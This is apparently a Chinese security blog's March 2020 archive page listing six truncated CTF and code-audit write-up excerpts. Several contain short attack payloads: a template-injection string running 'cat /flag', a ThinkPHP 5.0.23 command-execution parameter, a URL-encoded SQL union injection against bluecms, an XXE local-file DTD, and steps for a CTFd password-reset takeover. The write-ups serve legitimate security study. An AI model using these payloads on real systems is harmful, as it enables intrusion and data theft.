月份:2020年3月

6 篇文章

MRCTF Ezpop_Revenge小记
前言 一道typecho1.2的反序列化,顺便记录一下踩的坑 www.zip获得源码,结构大致如下 flag.php需要ssrf,如果成功会写入session 拿到源码直接去网上先找了一下有没有现成的payload(懒, 找到一篇类似的 https://p0sec.net/index.php/archives/114/ 但是入口点是install.…
BJDCTF 2nd web
fakegoogle SSTI {{ config.__class__.__init__.__globals__['os'].popen('BJD;cat /flag').read() }} old-hack tp5.0.23 _method=__construct&filter[]=system&a…
bluecms1.6审计
ad_js sql注入数字型注入1%20union%20select%201,2,3,4,5,6,(select%20user())common.inc.php sql注入此文件在include下,应该是一些基础的函数或配置,所以任何包含此文件的都可以进行注入emmm找到publish.php,正好包含了该文件common.inc.php注入点:i…
XCTF高校战”疫”分享赛
sqlcheckin sql注入 https://blog.csdn.net/nzjdsds/article/details/82980041 直接看例子: like也是一样 false false 得到true,令username:xxx'=',password:xxx'=',payload: char(61)用来绕过= username=xxx…
BUUCTF知识记录(2)
[GoogleCTF2019 Quals]Bnv 考点:本地DTD文件利用XXE漏洞 payload: <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/d…
[V&N2020 公开赛] web
HappyCTFd考点:CVE-2020-7245https://www.colabug.com/2020/0204/6940556/利用方式:注册一个如下账号,这里邮箱为buu上的内网邮箱系统前往/reset_password找回密码发送完成后把我们注册的用户名改一下:然后用邮箱的找回密码链接改admin的密码123,登陆,找到flag文件CHE…